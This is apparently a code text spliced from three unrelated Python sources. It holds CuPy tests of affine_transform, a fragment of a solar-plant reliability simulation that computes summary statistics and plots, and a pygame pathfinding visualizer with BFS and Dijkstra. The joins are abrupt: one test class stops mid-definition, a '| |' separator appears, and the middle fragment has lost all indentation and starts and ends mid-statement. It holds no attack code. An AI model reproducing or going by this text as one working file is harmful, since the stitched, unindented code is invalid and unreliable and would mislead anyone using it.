@testing.parameterize(*testing.product({
    'matrix_shape': [(2,), (2, 2), (2, 3), (3, 3)],
    'offset': [0.3, [-1.3, 1.3]],
    'output_shape': [None],
    'output': [None, numpy.float64, 'empty'],
    'order': [0, 1, 2, 3, 4, 5],
    'mode': legacy_modes + scipy16_modes,
    'cval': [1.0],
    'prefilter': [False, True],
}))
@testing.gpu
@testing.with_requires('scipy')
class TestAffineTransform:
    """Cross-check cupyx affine_transform against scipy.ndimage over the
    supported matrix shapes, orders, and boundary modes."""

    _multiprocess_can_split = True

    def _affine_transform(self, xp, scp, a, matrix):
        # Shared driver for all parameterizations.
        _conditional_scipy_version_skip(self.mode, self.order)
        ver = numpy.lib.NumpyVersion(scipy.__version__)
        # SciPy < 1.0.0 does not accept (ndim, ndim+1) augmented matrices;
        # return a trivial array so both backends agree on "nothing".
        if ver < '1.0.0' and matrix.ndim == 2 and matrix.shape[1] == 3:
            return xp.empty(0)
        # Force the last row of a full homogeneous matrix to [0, 0, 1].
        if matrix.shape == (3, 3):
            matrix[-1, 0:-1] = 0
            matrix[-1, -1] = 1
        affine_transform = scp.ndimage.affine_transform
        if self.output == 'empty':
            # Exercise the caller-preallocated output path.
            output = xp.empty_like(a)
            return_value = affine_transform(a, matrix, self.offset,
                                            self.output_shape, output,
                                            self.order, self.mode, self.cval,
                                            self.prefilter)
            assert return_value is None or return_value is output
            return output
        else:
            return affine_transform(a, matrix, self.offset, self.output_shape,
                                    self.output, self.order, self.mode,
                                    self.cval, self.prefilter)

    @testing.for_float_dtypes(no_float16=True)
    @testing.numpy_cupy_allclose(atol=1e-5, scipy_name='scp')
    def test_affine_transform_float(self, xp, scp, dtype):
        a = testing.shaped_random((100, 100), xp, dtype)
        matrix = testing.shaped_random(self.matrix_shape, xp, dtype)
        return self._affine_transform(xp, scp, a, matrix)

    @testing.for_complex_dtypes()
    @testing.numpy_cupy_allclose(atol=1e-5, scipy_name='scp')
    @testing.with_requires('scipy>=1.6.0')
    def test_affine_transform_complex_float(self, xp, scp, dtype):
        if self.output == numpy.float64:
            # must promote output to a complex dtype
            self.output = numpy.complex128
        a = testing.shaped_random((100, 100), xp, dtype)
        matrix = testing.shaped_random(self.matrix_shape, xp, xp.float64)
        return self._affine_transform(xp, scp, a, matrix)

    @testing.for_float_dtypes(no_float16=True)
    @testing.numpy_cupy_allclose(atol=1e-5, scipy_name='scp')
    def test_affine_transform_fortran_order(self, xp, scp, dtype):
        # Same as the float test, but with F-contiguous inputs.
        a = testing.shaped_random((100, 100), xp, dtype)
        a = xp.asfortranarray(a)
        matrix = testing.shaped_random(self.matrix_shape, xp, dtype)
        matrix = xp.asfortranarray(matrix)
        return self._affine_transform(xp, scp, a, matrix)

    def _hip_skip_invalid_condition(self):
        # Known-bad parameter combinations on ROCm/HIP builds.
        if (runtime.is_hip
                and self.matrix_shape in [(2,), (2, 2)]
                and self.order in [2, 3, 4, 5]
                and self.output in [None, 'empty']
                and self.prefilter):
            pytest.xfail('ROCm/HIP may have a bug')

    @testing.for_int_dtypes(no_bool=True)
    @testing.numpy_cupy_allclose(atol=1e-5, scipy_name='scp')
    def test_affine_transform_int(self, xp, scp, dtype):
        self._hip_skip_invalid_condition()
        # Old SciPy lacks support for some platform int widths; remap them.
        if numpy.lib.NumpyVersion(scipy.__version__) < '1.0.0':
            if dtype in (numpy.dtype('l'), numpy.dtype('q')):
                dtype = numpy.int64
            elif dtype in (numpy.dtype('L'), numpy.dtype('Q')):
                dtype = numpy.uint64
        a = testing.shaped_random((100, 100), xp, dtype)
        matrix = testing.shaped_random(self.matrix_shape, xp, dtype)
        out = self._affine_transform(xp, scp, a, matrix)
        # Zero out elements whose float result lands on a .5 tie, since the
        # backends may round those differently.
        float_out = self._affine_transform(xp, scp, a.astype(xp.float64),
                                           matrix) % 1
        half = xp.full_like(float_out, 0.5)
        out[xp.isclose(float_out, half, atol=1e-5)] = 0
        return out
@testing.gpu
@testing.with_requires('scipy')
class TestAffineExceptions:
    """Verify that invalid affine_transform arguments raise, identically on
    both the SciPy and cupyx implementations."""

    def test_invalid_affine_ndim(self):
        # A matrix with ndim not in {1, 2} must be rejected.
        ndimage_modules = (scipy.ndimage, cupyx.scipy.ndimage)
        for (xp, ndi) in zip((numpy, cupy), ndimage_modules):
            x = xp.ones((8, 8, 8))
            with pytest.raises(RuntimeError):
                ndi.affine_transform(x, xp.ones((3, 3, 3)))
            with pytest.raises(RuntimeError):
                ndi.affine_transform(x, xp.ones(()))

    def test_invalid_affine_shape(self):
        # Matrix dimensions must be compatible with the input's ndim.
        ndimage_modules = (scipy.ndimage, cupyx.scipy.ndimage)
        for (xp, ndi) in zip((numpy, cupy), ndimage_modules):
            x = xp.ones((8, 8, 8))
            with pytest.raises(RuntimeError):
                ndi.affine_transform(x, xp.ones((0, 3)))
            with pytest.raises(RuntimeError):
                ndi.affine_transform(x, xp.eye(x.ndim - 1))
            with pytest.raises(RuntimeError):
                ndi.affine_transform(x, xp.eye(x.ndim + 2))
            with pytest.raises(RuntimeError):
                ndi.affine_transform(x, xp.eye(x.ndim)[:, :-1])

    @testing.with_requires('scipy>=1.6.0')
    def test_invalid_output_dtype(self):
        # real output array with complex input is not allowed
        ndimage_modules = (scipy.ndimage, cupyx.scipy.ndimage)
        for (xp, ndi) in zip((numpy, cupy), ndimage_modules):
            x = xp.ones((8, 8, 8), dtype=numpy.complex128)
            output = xp.ones_like(x, dtype=x.real.dtype)
            with pytest.raises(RuntimeError):
                ndi.affine_transform(x, xp.ones((0, 3)), output=output)

    def test_invalid_texture_arguments(self):
        # The texture_memory=True fast path has extra restrictions; each of
        # the blocks below violates exactly one of them.
        if runtime.is_hip:
            pytest.skip('texture memory not supported yet')
        aft = cupyx.scipy.ndimage.affine_transform
        x = [cupy.ones((8, ) * n, dtype=cupy.float32) for n in range(1, 5)]
        # (ndim < 2) and (ndim > 3) must fail
        for i in [0, 3]:
            with pytest.raises(ValueError):
                aft(x[i], cupy.eye(i + 1, dtype=cupy.float32),
                    texture_memory=True)
        # wrong input dtype
        for dt in [cupy.float16, cupy.float64, cupy.int32, cupy.int64]:
            with pytest.raises(ValueError):
                aft(cupy.ones((8, 8), dtype=dt),
                    cupy.eye(3, dtype=cupy.float32), texture_memory=True)
        # wrong matrix shape
        for i in range(len(x)):
            with pytest.raises(ValueError):
                aft(x[i], cupy.eye(i, dtype=cupy.float32),
                    texture_memory=True)
        # wrong output
        with pytest.raises(ValueError):
            aft(x[2], cupy.eye(3, dtype=cupy.float32), output='wrong',
                texture_memory=True)
        # wrong mode
        for m in ['mirror', 'reflect', 'wrap', 'grid-mirror',
                  'grid-wrap', 'grid-constant', 'opencv']:
            with pytest.raises(ValueError):
                aft(x[2], cupy.eye(3, dtype=cupy.float32), mode=m,
                    texture_memory=True)
        # non matching output_shape and output's shape
        with pytest.raises(ValueError):
            output = cupy.empty((7, 7, 7), dtype=cupy.float32)
            aft(x[2], cupy.eye(3, dtype=cupy.float32), output_shape=(8, 8, 8),
                output=output, texture_memory=True)
        # non matching output_shape and input shape
        with pytest.raises(ValueError):
            aft(x[2], cupy.eye(3, dtype=cupy.float32), output_shape=(7, 7, 7),
                texture_memory=True)
@pytest.mark.skipif(runtime.is_hip, reason='texture memory not supported yet')
@testing.parameterize(*testing.product({
    'output': [None, numpy.float32, 'empty'],
    'output_shape': [None, 10],
    'order': [0, 1],
    'mode': ['constant', 'nearest'],
    'shape': [(100, 100), (10, 20), (10, 10, 10), (10, 20, 30)],
    'theta': [0, 90, 180, 270]
}))
@testing.gpu
@testing.with_requires('scipy')
class TestAffineTransformTextureMemory:
    """Check the texture_memory=True path of cupyx affine_transform against
    plain scipy.ndimage.affine_transform, using exact-degree rotations."""

    _multiprocess_can_split = True

    def _2d_rotation_matrix(self, theta, rotation_center):
        # Homogeneous 3x3 rotation about ``rotation_center``:
        # translate(center) @ rotate(theta) @ translate(-center).
        # cosdg/sindg are exact at multiples of 90 degrees.
        import scipy.special
        c, s = scipy.special.cosdg(theta), scipy.special.sindg(theta)
        m = numpy.array([
            [1, 0, rotation_center[0]],
            [0, 1, rotation_center[1]],
            [0, 0, 1]
        ], numpy.float32)
        m = numpy.dot(m, numpy.array([
            [c, -s, 0],
            [s, c, 0],
            [0, 0, 1]
        ], numpy.float32))
        m = numpy.dot(m, numpy.array([
            [1, 0, -rotation_center[0]],
            [0, 1, -rotation_center[1]],
            [0, 0, 1]
        ], numpy.float32))
        return m

    def _3d_rotation_matrix(self, theta, rotation_center):
        # Homogeneous 4x4 rotation about the x axis around ``rotation_center``.
        # Bug fix: scipy.special was only imported inside the 2-D helper, so
        # this method raised AttributeError unless the 2-D path had already
        # run in the same process; import the submodule locally here too.
        import scipy.special
        c, s = scipy.special.cosdg(theta), scipy.special.sindg(theta)
        m = numpy.array([
            [1, 0, 0, rotation_center[0]],
            [0, 1, 0, rotation_center[1]],
            [0, 0, 1, rotation_center[2]],
            [0, 0, 0, 1]
        ], numpy.float32)
        m = numpy.dot(m, numpy.array([
            [1, 0, 0, 0],
            [0, c, -s, 0],
            [0, s, c, 0],
            [0, 0, 0, 1]
        ], numpy.float32))
        m = numpy.dot(m, numpy.array([
            [1, 0, 0, -rotation_center[0]],
            [0, 1, 0, -rotation_center[1]],
            [0, 0, 1, -rotation_center[2]],
            [0, 0, 0, 1]
        ], numpy.float32))
        return m

    @testing.numpy_cupy_allclose(atol=0.1, scipy_name='scp')
    def test_affine_transform_texture_memory(self, xp, scp):
        a = xp.ones(self.shape, dtype=xp.float32)
        # Rotate about the array's exact center.
        center = numpy.divide(numpy.subtract(self.shape, 1), 2)
        if len(self.shape) == 2:
            matrix = self._2d_rotation_matrix(self.theta, center)
        elif len(self.shape) == 3:
            matrix = self._3d_rotation_matrix(self.theta, center)
        else:
            return pytest.xfail('Unsupported shape')
        if self.output == 'empty':
            output = xp.empty(self.shape, dtype=xp.float32)
            if self.output_shape:
                # output array and output_shape together is rejected by the
                # texture path and covered elsewhere.
                return pytest.skip('This combination is tested in '
                                   'test_invalid_texture_arguments')
        else:
            output = self.output
        if self.output_shape:
            output_shape = (self.output_shape, ) * len(self.shape)
        else:
            output_shape = self.output_shape
        if xp == cupy:
            # Only the cupy side takes texture_memory=True.
            m = cupyx.scipy.ndimage.affine_transform
            matrix = cupy.array(matrix)
            return m(a, matrix, output_shape=output_shape,
                     output=output, order=self.order,
                     mode=self.mode, texture_memory=True)
        else:
            m = scp.ndimage.affine_transform
            return m(a, matrix, output_shape=output_shape,
                     output=output, order=self.order,
                     mode=self.mode)
@testing.gpu
@testing.with_requires('opencv-python')
class TestAffineTransformOpenCV:
_multiprocess_can_split = True
@testing.for_float_dtypes(no_float16=True)
# The precision of cv2.warpAffine is not good because it uses fixed-point
# arithmetic.
@testing.numpy_cupy_allclose(atol=0.2)
| |
failures
for fail in case.config[c].get(ck.PARTIAL_FAIL, {}).keys():
if f"{c}_failures_by_type_{fail}" not in summary_data:
summary_data[f"{c}_failures_by_type_{fail}"] = [None]
summary_data[f"{c}_failures_by_type_{fail}"] += [comp.comps[c][f"failure_by_type_{fail}"].sum()]
# if the component had no failures, set everything here and continue
if sum_fails == 0:
summary_data[f"{c}_mtbf"] += [lifetime * 365]
summary_data[f"{c}_mttr"] += [0]
summary_data[f"{c}_mttd"] += [0]
else:
# mean time between failure
summary_data[f"{c}_mtbf"] += [lifetime * 365 * case.config[c][ck.NUM_COMPONENT] / sum_fails]
# mean time to repair
if case.config[c][ck.CAN_REPAIR]:
# take the number of fails minus whatever components have not been repaired by the end of the simulation to get the number of repairs
sum_repairs = sum_fails - len(comp.comps[c].loc[(comp.comps[c]["state"] == 0)])
if sum_repairs > 0:
summary_data[f"{c}_mttr"] += [comp.total_repair_time[c] / sum_repairs]
else:
summary_data[f"{c}_mttr"] += [0]
else:
summary_data[f"{c}_mttr"] += [0]
# mean time to detection (mean time to acknowledge)
if (
case.config[c][ck.CAN_MONITOR]
or case.config[c].get(ck.COMP_MONITOR, None)
or case.config[c].get(ck.INDEP_MONITOR, None)
):
# take the number of fails minus the components that have not been repaired and also not be detected by monitoring
mask = (comp.comps[c]["state"] == 0) & (comp.comps[c]["time_to_detection"] > 1)
sum_monitor = sum_fails - len(comp.comps[c].loc[mask])
if sum_monitor > 0:
summary_data[f"{c}_mttd"] += [comp.total_monitor_time[c] / sum_monitor]
else:
summary_data[f"{c}_mttd"] += [0]
else:
summary_data[f"{c}_mttd"] += [0]
else:
# mean time between failure
summary_data[f"{c}_total_failures"] += [0]
summary_data[f"{c}_mtbf"] += [lifetime * 365]
summary_data[f"{c}_mttr"] += [0]
summary_data[f"{c}_mttd"] += [0]
# availability
if f"{c}_availability" not in summary_data:
summary_data[f"{c}_availability"] = [None]
summary_data[f"{c}_availability"] += [
(
1
- (comp.comps[c]["avail_downtime"].sum() / (lifetime * case.annual_daylight_hours))
/ case.config[c][ck.NUM_COMPONENT]
)
]
# generate dataframes
summary_results = pd.DataFrame(index=summary_index, data=summary_data)
summary_results.index.name = "Realization"
# reorder columns for summary results
reorder = list(summary_results.columns[0:2]) # lcoe and npv
reorder += list(summary_results.columns[lifetime * 3 + 2 :]) # failures and avail
reorder += list(summary_results.columns[2 : lifetime * 3 + 2]) # energy
summary_results = summary_results[reorder]
degradation_results = pd.DataFrame(index=day_index, data=degradation_data)
dc_power_results = pd.DataFrame(index=timeseries_index, data=timeseries_dc_data)
ac_power_results = pd.DataFrame(index=timeseries_index, data=timeseries_ac_data)
dc_power_results.index.name = "Hour"
ac_power_results.index.name = "Hour"
degradation_results.index.name = "Day"
cost_index = pd.MultiIndex.from_product([yearly_cost_index, year_index], names=["Realization", "Year"])
yearly_cost_results = pd.DataFrame(index=cost_index, data=yearly_cost_data)
yearly_cost_results["total"] = yearly_cost_results.sum(axis=1)
# fails per year, same multi index as cost
yearly_fail_results = pd.DataFrame(index=cost_index, data=yearly_fail_data)
yearly_fail_results["total"] = yearly_fail_results.sum(axis=1)
stats_append = []
summary_no_base = summary_results.iloc[1:]
min = summary_no_base.min()
min.name = "min"
stats_append.append(min)
max = summary_no_base.max()
max.name = "max"
stats_append.append(max)
mean = summary_no_base.mean()
mean.name = "mean"
stats_append.append(mean)
median = summary_no_base.median()
median.name = "median"
stats_append.append(median)
std = summary_no_base.std()
std.name = "stddev"
stats_append.append(std)
conf_interval = case.config[ck.CONF_INTERVAL]
conf_int = cf_interval(1 - (conf_interval / 100), std, case.config[ck.NUM_REALIZATION])
lower_conf = mean - conf_int
lower_conf.name = f"{conf_interval}% lower confidence interval of mean"
stats_append.append(lower_conf)
upper_conf = mean + conf_int
upper_conf.name = f"{conf_interval}% upper confidence interval of mean"
stats_append.append(upper_conf)
# p test, which is using the ppf of the normal distribituion with our calculated mean and std. We use scipy's functions for this
# see https://help.helioscope.com/article/141-creating-a-p50-and-p90-with-helioscope
for p in p_vals:
values = []
# calculate the p value for every column
for m, s in zip(mean, std):
if s != 0: # for columns with no STDDEV
values.append(stats.norm.ppf((1 - p / 100), loc=m, scale=s))
else:
values.append(None)
# save results
values = pd.Series(values, index=mean.index)
values.name = f"P{p}"
stats_append.append(values)
# since pandas wants to depercate append, gotta convert series into dataframes
summary_results = pd.concat([summary_results, *[s.to_frame().transpose() for s in stats_append]])
return [
summary_results,
degradation_results,
dc_power_results,
ac_power_results,
yearly_cost_results,
yearly_fail_results,
]
def graph_results(case: SamCase, results: List[Components], save_path: str = None) -> None:
"""
Generate graphs from a list of Component objects from each realization
Args:
case (:obj:`SamCase`): The loaded and verified case to use with the simulation
results (:obj:`list(Components)`): List of component objects that contain the results for each realization
save_path (str, Optional): Path to save graphs to, if provided
"""
lifetime = case.config[ck.LIFETIME_YRS]
colors = [
"r",
"g",
"b",
"c",
"m",
"y",
"k",
"tab:orange",
"tab:brown",
"lime",
"tab:gray",
"indigo",
"navy",
"pink",
"coral",
"yellow",
"teal",
"fuchsia",
"palegoldenrod",
"darkgreen",
]
# base case data to compare to
base_losses = case.base_losses
base_load = np.array(case.base_load) if case.base_load is not None else None
base_ac_energy = np.array(case.base_ac_energy)
base_annual_energy = np.array(case.base_annual_energy)
base_tax_cash_flow = np.array(case.base_tax_cash_flow)
# parse data
avg_ac_energy = np.zeros(len(case.base_ac_energy)) # since length is variable based on frequency of weather file
avg_annual_energy = np.zeros(lifetime)
avg_losses = np.zeros(len(ck.losses))
avg_tax_cash_flow = np.zeros(lifetime + 1) # add 1 for year 0
avg_failures = np.zeros((len(ck.component_keys), lifetime * 365)) # 7 types of components
# computing the average across every realization
for comp in results:
avg_ac_energy += np.array(comp.timeseries_ac_power)
avg_annual_energy += np.array(comp.annual_energy)
avg_losses += np.array(list(comp.losses.values()))
avg_tax_cash_flow += np.array(comp.tax_cash_flow)
for i, c in enumerate(ck.component_keys):
if not case.config.get(c, None):
continue
for f in comp.summarize_failures(c).values():
avg_failures[i] += f
# monthly and annual energy
avg_ac_energy /= len(results)
avg_annual_energy /= len(results)
avg_losses /= len(results)
avg_tax_cash_flow /= len(results)
avg_failures /= len(results)
# sum up failures to be per year
avg_failures = np.sum(np.reshape(avg_failures, (len(ck.component_keys), lifetime, 365)), axis=2)
# determine the frequency of the data, same as frequncy of supplied weather file
total = int(len(avg_ac_energy) / lifetime)
if total == 8760:
freq = 1
else:
freq = 0
while total > 8760:
freq += 1
total /= freq
avg_ac_energy = np.reshape(avg_ac_energy[0::freq], (lifetime, 8760)) # yearly energy by hour
avg_ac_energy = np.sum(avg_ac_energy, axis=0) / lifetime # yearly energy average
avg_ac_energy = np.reshape(avg_ac_energy, (365, 24)) # day energy by hour
avg_day_energy_by_hour = avg_ac_energy.copy() # copy for heatmap yearly energy generation
avg_ac_energy = np.sum(avg_ac_energy, axis=1) # energy per day
base_ac_energy = np.reshape(base_ac_energy[0::freq], (lifetime, 8760))
base_ac_energy = np.sum(base_ac_energy, axis=0) / lifetime
base_ac_energy = np.reshape(base_ac_energy, (365, 24))
base_day_energy_by_hour = base_ac_energy.copy() # copy for heatmap yearly energy generation
base_ac_energy = np.sum(base_ac_energy, axis=1)
# daily load, load is the same between realizations and base
if base_load is not None:
base_load = np.reshape(base_load, (365, 24))
base_load = np.sum(base_load, axis=1)
avg_losses = {k: v for k, v in zip(ck.losses, avg_losses)} # create losses dictionary
# calculate per month energy averaged across every year on every realization
current_month = datetime(datetime.utcnow().year, 1, 1)
# relative deltas allow dynamic month lengths such that each month has the proper number of days
delta = relativedelta(months=1)
start = 0
monthly_energy = {}
monthly_load = {}
base_monthly_energy = {}
for _ in range(12):
month = current_month.strftime("%b")
num_days = ((current_month + delta) - current_month).days # number of days in this month
monthly_energy[month] = np.sum(avg_ac_energy[start : start + num_days])
base_monthly_energy[month] = np.sum(base_ac_energy[start : start + num_days])
if base_load is not None:
monthly_load[month] = np.sum(base_load[start : start + num_days])
current_month += delta
start += num_days
fig, (ax1, ax2) = plt.subplots(1, 2, sharey=True)
fig.set_figheight(5)
fig.set_figwidth(10)
ax1.bar(list(monthly_energy.keys()), list(monthly_energy.values()))
ax1.set_title("Realization Average")
ax1.set_xlabel("Month")
ax1.set_ylabel("kWh")
ax2.bar(list(monthly_energy.keys()), list(base_monthly_energy.values()))
ax2.set_title("Base Case")
ax2.set_xlabel("Month")
ax2.set_ylabel("kWh")
fig.suptitle("Monthly Energy Production")
fig.tight_layout()
if save_path:
plt.savefig(os.path.join(save_path, "Average Monthly Energy Production.png"), bbox_inches="tight", dpi=200)
else:
plt.show()
plt.close() # clear plot
# graph the monthly energy against the monthly load
if base_load is not None:
fig, (ax1, ax2) = plt.subplots(1, 2, sharey=True)
fig.set_figheight(5)
fig.set_figwidth(10)
ind = np.arange(len(monthly_energy))
ax1.bar(ind - 0.2, list(monthly_energy.values()), width=0.4, label="AC Energy")
ax1.bar(ind + 0.2, list(monthly_load.values()), width=0.4, color="tab:gray", label="Electricity Load")
ax1.set_title("Realization Average")
ax1.set_xlabel("Month")
ax1.set_xticks(ind)
ax1.set_xticklabels(labels=list(monthly_energy.keys()))
ax1.set_ylabel("kWh")
ax2.bar(ind - 0.2, list(base_monthly_energy.values()), width=0.4)
ax2.bar(ind + 0.2, list(monthly_load.values()), width=0.4, color="tab:gray")
ax2.set_title("Base Case")
ax2.set_xlabel("Month")
ax2.set_xticks(ind)
ax2.set_xticklabels(labels=list(monthly_energy.keys()))
ax2.set_ylabel("kWh")
fig.legend()
fig.suptitle("Monthly Energy and Load")
fig.tight_layout()
if save_path:
plt.savefig(os.path.join(save_path, "Average Monthly Energy and Load.png"), bbox_inches="tight", dpi=200)
else:
plt.show()
plt.close() # clear plot
fig, (ax1, ax2) = plt.subplots(1, 2, sharey=True)
fig.set_figheight(5)
fig.set_figwidth(10)
# add 1 to have years 1->25
ax1.bar(np.arange(lifetime) + 1, avg_annual_energy)
ax1.set_title("Realization Average")
ax1.set_xlabel("Year")
ax1.set_ylabel("kWh")
ax2.bar(np.arange(lifetime) + 1, base_annual_energy)
ax2.set_title("Base Case")
ax2.set_xlabel("Year")
ax2.set_ylabel("kWh")
fig.suptitle("Annual Energy Production")
fig.tight_layout()
if save_path:
plt.savefig(os.path.join(save_path, "Average Annual Energy Production.png"), bbox_inches="tight", dpi=200)
else:
plt.show()
plt.close() # clear plot
# this helper function just makes it easier since the base case requires this as well
def gen_loss_data(losses):
# losses
loss_data = {
"POA front-side shading loss": losses["annual_poa_shading_loss_percent"],
"POA front-side soiling loss": losses["annual_poa_soiling_loss_percent"],
"POA front-side reflection (IAM) loss": losses["annual_poa_cover_loss_percent"],
"DC module deviation from STC": losses["annual_dc_module_loss_percent"],
"DC inverter MPPT clipping loss": losses["annual_dc_mppt_clip_loss_percent"],
"DC mismatch loss": losses["annual_dc_mismatch_loss_percent"],
"DC diodes and connections loss": losses["annual_dc_diodes_loss_percent"],
"DC wiring loss": losses["annual_dc_wiring_loss_percent"],
"DC tracking loss": losses["annual_dc_tracking_loss_percent"],
"DC nameplate loss": losses["annual_dc_nameplate_loss_percent"],
"DC power optimizer loss": losses["annual_dc_optimizer_loss_percent"],
"DC performance adjustment loss": losses["annual_dc_perf_adj_loss_percent"],
"AC inverter power clipping loss": losses["annual_ac_inv_clip_loss_percent"],
"AC inverter | |
""" Pathfinding Visualizer Made by <NAME> """
import pygame
from tkinter import messagebox, Tk
from queue import PriorityQueue
import os
from Colours import Colours
from Grid import Grid
import pygame_menu
import time
from playsound import playsound
# Position the SDL window 350 px from the left and 50 px from the top of the screen.
os.environ['SDL_VIDEO_WINDOW_POS'] = "%d,%d" % (350, 50) # open window in the middle of the screen
icon = pygame.image.load('images/location.png')  # window icon
WIDTH = 600  # window size in pixels (square window)
ROWS = 25  # grid dimension (ROWS x ROWS cells)
# Shared helpers used by every algorithm below.
grid = Grid()
colour = Colours()
# Main Visualizer Controller
def visualize(width, ROWS, twoDestinations):
    """ Main interactive loop of the visualizer.

    Left-click places (in order) the source, the destination, an optional
    second destination when ``twoDestinations`` is True, and then obstacles.
    Right-click clears a cell.  Once a source and destination exist, keys
    1-5 run the different search algorithms on the current grid.

    Args:
        width: pixel width of the drawing surface passed to the grid helpers.
        ROWS: number of rows/columns in the grid (shadows the module global).
        twoDestinations: when True, a second destination may be placed and
            only the two-destination variants (keys 1 and 2) are enabled.
    """
    playsound('sounds/buttonClicked.mp3')
    map = grid.createGrid(ROWS, width)
    pygame.display.set_caption("Pathfinding Visualizer")
    pygame.display.set_icon(icon)
    window = pygame.display.set_mode((WIDTH, WIDTH))
    pygame.display.update()
    source = None
    destination = None
    destination2 = None
    # NOTE: 'map' and 'exit' shadow Python builtins within this function.
    exit = False
    while not exit:
        grid.colour(window, map, ROWS, width)
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                exit = True
            # Left mouse button: place source, destination(s), then obstacles.
            if pygame.mouse.get_pressed()[0]:
                position = pygame.mouse.get_pos()
                row, column = grid.getClicked(position, ROWS, width)
                vertex = map[row][column]
                if not source and vertex != destination:
                    source = vertex
                    source.setSource()
                elif not destination and vertex != source:
                    destination = vertex
                    destination.setDestination()
                elif twoDestinations and not destination2 and vertex != source and vertex != destination:
                    destination2 = vertex
                    destination2.setDestination()
                elif vertex != destination and vertex != source and vertex != destination2:
                    vertex.setObstacle()
            # Right mouse button: clear the cell (and forget it if it was a terminal).
            elif pygame.mouse.get_pressed()[2]: # RIGHT
                position = pygame.mouse.get_pos()
                row, column = grid.getClicked(position, ROWS, width)
                vertex = map[row][column]
                vertex.clear()
                if vertex == source:
                    source = None
                elif vertex == destination:
                    destination = None
                elif vertex == destination2:
                    destination2 = None
            # Keyboard: launch an algorithm once both terminals are placed.
            if event.type == pygame.KEYDOWN:
                if source and destination:
                    if event.key == pygame.K_1:
                        map = setGameBoard(map)
                        grid.colour(window, map, ROWS, width)
                        pygame.display.update()
                        if not twoDestinations:
                            breadthFirstSearch(lambda: grid.colour(window, map, ROWS, width), source, destination, map)
                        elif destination2:
                            twoDestinationBFS(lambda: grid.colour(window, map, ROWS, width), source, destination,
                                              destination2, map)
                    elif event.key == pygame.K_2:
                        map = setGameBoard(map)
                        grid.colour(window, map, ROWS, width)
                        pygame.display.update()
                        if not twoDestinations:
                            dijkstrasAlgorithm(lambda: grid.colour(window, map, ROWS, width), source, destination, map)
                        elif destination2:
                            dijkstraTwoDestinations(lambda: grid.colour(window, map, ROWS, width), source, destination,
                                                    destination2, map)
                    elif event.key == pygame.K_3 and not twoDestinations:
                        map = setGameBoard(map)
                        grid.colour(window, map, ROWS, width)
                        pygame.display.update()
                        AStarAlgorithm(lambda: grid.colour(window, map, ROWS, width), source, destination, map)
                    elif event.key == pygame.K_4 and not twoDestinations:
                        map = setGameBoard(map)
                        grid.colour(window, map, ROWS, width)
                        pygame.display.update()
                        BFSBiDirectional(lambda: grid.colour(window, map, ROWS, width), source, destination, map)
                    elif event.key == pygame.K_5 and not twoDestinations:
                        map = setGameBoard(map)
                        grid.colour(window, map, ROWS, width)
                        pygame.display.update()
                        dijkstraBiDirectional(lambda: grid.colour(window, map, ROWS, width), source, destination, map)
def setGameBoard(map):
    """Prepare the grid for a fresh search.

    Clears every cell that is not a source, destination, or obstacle
    (removing leftovers from a previous run), then rebuilds each
    vertex's adjacency list.  Returns the same grid object.
    """
    for row in map:
        for vertex in row:
            keep = vertex.isSource() or vertex.isDestination() or vertex.isObstacle()
            if not keep:
                vertex.clear()
            vertex.addConnections(map)
    return map
""" Base Pathfinding Algorithms"""
def breadthFirstSearch(drawing, source, destination, map):
    """ Animated breadth-first search from source to destination.

    Args:
        drawing: zero-argument callable that redraws the grid each step.
        source, destination: grid vertex objects.
        map: 2D list of vertex objects (the grid rows).

    Returns:
        True when a path is found (after animating it and showing an info
        dialog).  When the queue empties without reaching the destination,
        shows a "No Solution" dialog and implicitly returns None.
    """
    queue = [source]
    parent = {}
    # BFS treats every edge as cost 1, so 'shortest' is the hop count.
    shortest = {vertex: float("inf") for row in map for vertex in row}
    shortest[source] = 0
    startTime = time.time()
    while len(queue) != 0:
        # Keep the window responsive while the search animates.
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
        current = queue.pop(0)
        # Path Found
        if current == destination:
            totalTime = time.time() - startTime
            distanceCovered = reconstructPath(parent, destination, drawing, source)
            destination.setDestination()
            message = " Speed: {totalTime:.1f}s Distance Covered: {distance}"
            Tk().wm_withdraw()
            messagebox.showinfo("Path Found!!", message.format(totalTime=totalTime, distance=distanceCovered))
            return True
        # Relax every neighbour of the current vertex.
        for edge in current.connections:
            tempScore = shortest[current] + 1
            if tempScore < shortest[edge]:
                parent[edge] = current
                shortest[edge] = tempScore
                # 'edge not in queue' is a linear scan; acceptable for a 25x25 grid.
                if edge not in queue and edge != source:
                    queue.append(edge)
                    if not edge.isVisited():
                        edge.setInQueue()
        drawing()
        if current != source:
            current.setAsVisited()
    # Queue exhausted without reaching the destination.  (The original kept a
    # 'found' flag that was never set to True, so the guard was a no-op; the
    # dead flag has been removed.)
    Tk().wm_withdraw()
    messagebox.showinfo("No Solution", "There was no solution")
def dijkstrasAlgorithm(drawing, source, destination, map):
    """ Animated Dijkstra's algorithm from source to destination.

    Args:
        drawing: zero-argument callable that redraws the grid each step.
        source, destination: grid vertex objects.
        map: 2D list of vertex objects (the grid rows).

    Returns:
        True when a path is found (after animating it and showing an info
        dialog).  When the priority queue empties first, shows a
        "No Solution" dialog and implicitly returns None.
    """
    # Insertion counter breaks priority ties, since vertices are not comparable.
    count = 0
    queue = PriorityQueue()
    queue.put((0, count, source))
    parent = {}
    gScore = {vertex: float("inf") for row in map for vertex in row}  # shortest known distance from source
    gScore[source] = 0
    # Set mirror of the priority queue contents, for O(1) membership tests.
    in_queue = {source}
    startTime = time.time()
    while not queue.empty():
        # Keep the window responsive while the search animates.
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
        current = queue.get()[2]
        in_queue.remove(current)
        if current == destination:
            timeTaken = time.time() - startTime
            distanceCovered = reconstructPath(parent, destination, drawing, source)
            destination.setDestination()
            message = " Speed: {timeTaken:.1f}s Distance Covered: {distance}"
            Tk().wm_withdraw()
            messagebox.showinfo("Path Found!!", message.format(timeTaken=timeTaken, distance=distanceCovered))
            return True
        # Relax each neighbour using its edge weight.
        for edge in current.connections:
            temp = gScore[current] + edge.getWeight()
            if temp < gScore[edge]:
                parent[edge] = current
                gScore[edge] = temp
                if edge not in in_queue:
                    count += 1
                    queue.put((gScore[edge], count, edge))
                    in_queue.add(edge)
                    edge.setInQueue()
        drawing()
        if current != source:
            current.setAsVisited()
    # Priority queue exhausted without reaching the destination.  (The original
    # kept a 'found' flag that was never set, so the final guard was a no-op;
    # the dead flag has been removed and 'queueDict' renamed to 'in_queue'
    # since it is a set, not a dict.)
